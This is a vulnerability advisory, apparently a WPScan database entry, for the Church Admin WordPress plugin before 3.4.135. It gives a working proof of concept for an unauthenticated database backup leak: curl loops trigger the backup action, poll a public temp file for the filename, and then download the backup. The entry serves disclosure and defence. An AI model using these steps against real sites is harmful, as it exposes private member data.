WordPress Plugin Vulnerabilities
Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure
Description
The plugin does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the "refresh-backup" action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to disclose the final backup filename, which can then be fetched by the attacker to download the backup of the plugin's DB data
Proof of Concept
1. In one terminal, continuously fetch from http://127.0.0.1:8080/?action=refresh-backup: while true; do curl -s 'http://127.0.0.1:8080/?action=refresh-backup' >/dev/null; done 2. In a second terminal, continuously fetch from /wp-content/uploads/church-admin-cache/temp.sql while true; do curl -s http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/temp.sql | grep '\.sql\.gz'; done 3. After a while, the backup filename should be found by the curl | grep command (second terminal), once found, abort the command in terminal one first, then the one in the second terminal - use the last output of the second terminal as the filename (<md5-hash>.sql.gz). 4. Download the backup by accessing it via http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/<extracted-md5-hash>.sql.gz
Affects Plugins
Fixed in 3.4.135 References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)
WPScan 